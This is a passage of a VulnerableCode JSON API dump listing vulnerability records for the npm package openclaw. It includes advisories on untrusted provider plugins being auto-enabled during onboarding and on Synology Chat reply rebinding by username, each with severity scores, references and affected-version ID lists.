erability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35622","GHSA-mp66-rf4f-mhh8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aja9-wzp2-kbcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89095?format=json","vulnerability_id":"VCID-arks-g6hw-abbw","summary":"OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins\n## Summary\n\nWorkspace provider auth choices could auto-enable untrusted provider plugins.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nNon-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup.\n\n## Technical Details\n\nThe fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled.\n\n## Fix\n\nThe issue was fixed in #62368. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d97eae53e212ae26f3aebcd6a50ffc6877f770d`\n- PR: #62368\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43569","reference_id":"","reference_type":"","scores":[{"value":"0.00107","scoring_system":"epss","scoring_elements":"0.28508","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.29982","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.30011","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43569"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62368","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62368"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43569","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43569"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth"},{"reference_url":"https://github.com/advisories/GHSA-939r-rj45-g2rj","reference_id":"GHSA-939r-rj45-g2rj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-939r-rj45-g2rj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["CVE-2026-43569","GHSA-939r-rj45-g2rj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-arks-g6hw-abbw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91806?format=json","vulnerability_id":"VCID-asuy-amja-eyd4","summary":"OpenClaw: Synology Chat reply delivery could be rebound through username-based user resolution.\n## Summary\nSynology Chat reply delivery could rebind to a mutable username match instead of the stable numeric user_id recorded by the webhook event.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7ade3553b74ee3f461c4acd216653d5ba411f455`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/webhook-handler.ts now keeps replies bound to the stable webhook user identifier unless an explicit dangerous opt-in is enabled.\n- extensions/synology-chat/src/config-schema.ts contains the explicit dangerous opt-in seam instead of silent username rebinding.\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35670","reference_id":"","reference_type":"","scores":[{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26596","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26636","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26645","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35670"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35670","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35670"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-wv46-v6xc-2qhf","reference_id":"GHSA-wv46-v6xc-2qhf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv46-v6xc-2qhf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1f